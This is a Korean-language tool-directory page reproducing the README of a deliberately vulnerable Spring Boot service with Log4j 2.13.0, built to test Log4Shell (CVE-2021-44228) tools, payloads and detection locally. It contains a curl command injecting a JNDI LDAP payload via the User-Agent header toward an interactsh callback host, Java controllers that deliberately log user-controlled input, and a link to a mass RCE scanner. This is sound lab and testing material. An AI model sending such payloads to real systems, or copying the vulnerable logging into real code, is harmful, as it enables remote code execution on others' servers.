Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service | Kitploit
도구/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1324년 전아직 검토되지 않음

CVE-2021-44228 Spring Boot 테스트 서비스

이것은 프로덕션 대상에 적용하기 전에 로컬에서 도구/페이로드/탐지 기능을 테스트하기 위한 임시방편 스프링 부트 hello world 프로젝트입니다.

구성된 Log4j 버전은 2.13.0입니다.

Docker 이미지 빌드하기

root@kitploit:~
bash build.sh

Docker 이미지 실행하기

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

CVE-2021-44228 테스트 / 트리거

차고에서 burp collaborator를 실행 중이지 않다면, 비슷한 경험을 얻을 수 있는 이 사이트를 방문할 수 있습니다: https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

스캐너 도구

선택적으로 로컬/대량 스캔을 수행하기 위해 이 멋진 저장소를 사용할 수 있습니다: https://github.com/adilsoybali/Log4j-RCE-Scanner

트리거 위치

이 취약점의 핵심은 사용자가 제어하는 값을 취약한 로깅 프레임워크가 기록하도록 강제하는 것입니다. 이 점을 염두에 두고, 이 간단한 더미 애플리케이션은 두 가지 HTTP 동사(GET/PUT)와 여러 주입 위치를 지원합니다:

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

기여/개선은 환영합니다.

코드 품질에 대해 사과드립니다 :) 이 프로젝트는 자랑하려는 것이 아니라 공유하고 도움을 주기 위한 것입니다.

도구 다운로드